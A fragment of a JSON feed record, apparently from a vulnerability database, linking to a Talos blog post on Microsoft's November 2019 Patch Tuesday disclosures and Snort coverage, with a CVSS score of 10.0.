"http://feedproxy.google.com/~r/feedburner/Talos/~3/RA0KAo5GE1Y/microsoft-patch-tuesday-nov-2019.html", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 Nov. 2019: Vulnerability disclosures and Snort coverage", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
